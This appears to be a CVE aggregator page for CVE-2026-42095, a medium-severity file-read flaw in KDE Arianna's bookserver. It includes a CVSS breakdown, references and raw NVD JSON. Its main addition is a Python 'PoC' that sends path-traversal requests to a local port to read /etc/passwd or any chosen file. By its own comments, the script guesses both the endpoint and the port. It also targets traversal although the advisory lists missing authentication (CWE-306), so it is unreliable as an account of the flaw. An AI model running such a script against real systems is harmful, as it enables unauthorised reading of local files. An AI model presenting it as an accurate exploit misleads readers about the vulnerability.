CVE-2026-42095

Description

bookserver in KDE Arianna before 26.04.1 allows attackers to read files over a socket connection by guessing a URL.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

KDE Arianna < 26.04.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-42095 PoC: KDE Arianna bookserver information disclosure
# This script attempts to read local files by guessing the URL path on the local socket.

def exploit(target_host, target_port, file_path):
    # Construct the malicious URL by guessing the path
    # Note: The actual endpoint structure depends on the specific bookserver implementation
    # Commonly it might look like http://localhost:port/files/../../../etc/passwd
    url = f"http://{target_host}:{target_port}/files/..{file_path}"
    
    try:
        print(f"[+] Attempting to retrieve: {file_path}")
        response = requests.get(url, timeout=5)
        
        if response.status_code == 200:
            print("[+] Success! File content retrieved:")
            print(response.text)
        else:
            print(f"[-] Failed. Server returned status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Default target based on local vulnerability context
    TARGET_HOST = "127.0.0.1"
    TARGET_PORT = 8080  # Placeholder, actual port needs to be identified
    
    # Example file to read
    FILE_TO_READ = "/etc/passwd"
    
    if len(sys.argv) > 1:
        FILE_TO_READ = sys.argv[1]
    
    exploit(TARGET_HOST, TARGET_PORT, FILE_TO_READ)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42095
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42095
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42095/
[4] VulDB https://vuldb.com/cve/CVE-2026-42095
[5] https://github.com/KDE/arianna/tags
[6] https://invent.kde.org/graphics/arianna/-/commit/3cd56fce103ab62887c5592827d78a1197cd926a
[7] https://invent.kde.org/graphics/arianna/-/commit/485851d25de279a9d2711d3780443530e9851300
[8] https://kde.org/info/security/advisory-20260424-1.txt

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42095", "sourceIdentifier": "[email protected]", "published": "2026-04-24T15:16:48.273", "lastModified": "2026-04-24T17:55:55.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "bookserver in KDE Arianna before 26.04.1 allows attackers to read files over a socket connection by guessing a URL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/KDE/arianna/tags", "source": "[email protected]"}, {"url": "https://invent.kde.org/graphics/arianna/-/commit/3cd56fce103ab62887c5592827d78a1197cd926a", "source": "[email protected]"}, {"url": "https://invent.kde.org/graphics/arianna/-/commit/485851d25de279a9d2711d3780443530e9851300", "source": "[email protected]"}, {"url": "https://kde.org/info/security/advisory-20260424-1.txt", "source": "[email protected]"}]}}